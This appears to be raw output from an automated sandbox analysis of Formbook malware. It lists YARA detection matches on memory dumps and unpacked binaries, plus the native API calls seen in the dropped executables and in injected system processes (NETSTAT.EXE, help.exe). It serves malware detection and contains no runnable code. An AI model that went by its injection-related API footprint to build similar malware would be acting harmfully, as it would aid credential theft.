          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.460372240.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.556558857.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000001.366394202.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000001.330792786.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.561947063.00000000009B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000002.00000002.337333387.00000000030E0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.476443406.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.583791547.0000000002350000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000003.00000002.475830618.0000000000CD0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000017.00000002.559844329.0000000000E70000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.373308889.00000000022B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000011.00000002.584337141.0000000002680000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000002.561291954.0000000000930000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.elxhan.exe.22b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.1.elxhan.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.elxhan.exe.22b0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vi0EwpbUht.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 7.2.elxhan.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.1.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 3.2.vi0EwpbUht.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 2.2.vi0EwpbUht.exe.30e0000.4.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0041A050 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419F20 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419FD0 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_0041A04A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419F74 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419F1A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00419FCB NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A098F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A099A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A095D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A096E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A097A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A098A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A099D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09A10 NtQuerySection,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A095F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09560 NtWriteFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A096D0 NtCreateKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09760 NtOpenProcess,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A09770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_2_00A0A770 NtOpenThread,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_0041A050 NtClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419F20 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419FD0 NtReadFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_0041A04A NtClose,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419F74 NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419F1A NtCreateFile,
          Source: C:\Users\user\AppData\Local\Temp\3582-490\vi0EwpbUht.exeCode function: 3_1_00419FCB NtReadFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_0041A050 NtClose,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_0041A100 NtAllocateVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419F20 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419FD0 NtReadFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_0041A04A NtClose,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419F74 NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419F1A NtCreateFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00419FCB NtReadFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A598F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A599A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A595D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A596E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A597A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A598A0 NtWriteVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59820 NtEnumerateKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5B040 NtSuspendThread,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A599D0 NtCreateProcessEx,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59950 NtQueueApcThread,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A80 NtOpenDirectoryObject,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59A10 NtQuerySection,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5A3B0 NtGetContextThread,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59B00 NtSetValueKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A595F0 NtQueryInformationFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59520 NtWaitForSingleObject,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5AD30 NtSetContextThread,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59560 NtWriteFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A596D0 NtCreateKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59610 NtEnumerateValueKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59670 NtQueryInformationProcess,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59650 NtQueryValueKey,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59FE0 NtCreateMutant,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59730 NtQueryVirtualMemory,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5A710 NtOpenProcessToken,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59760 NtOpenProcess,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A59770 NtSetInformationFile,
          Source: C:\Users\user\AppData\Roaming\hbqilrp\elxhan.exeCode function: 7_2_00A5A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC99A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC96D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9610 NtEnumerateValueKey,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC95F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9560 NtWriteFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DCAD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02DC9520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236A050 NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236A100 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369F20 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369FD0 NtReadFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_0236A04A NtClose,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369F1A NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369F74 NtCreateFile,
          Source: C:\Windows\SysWOW64\NETSTAT.EXECode function: 17_2_02369FCB NtReadFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C96E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C95D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9B00 NtSetValueKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CA3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A50 NtCreateFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C99D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C99A0 NtCreateSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CB040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9840 NtDelayExecution,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C98F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C98A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CA770 NtOpenThread,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9770 NtSetInformationFile,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036CA710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9710 NtQueryInformationToken,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C97A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9780 NtMapViewOfSection,
          Source: C:\Windows\SysWOW64\help.exeCode function: 23_2_036C9670 NtQueryInformationProcess,
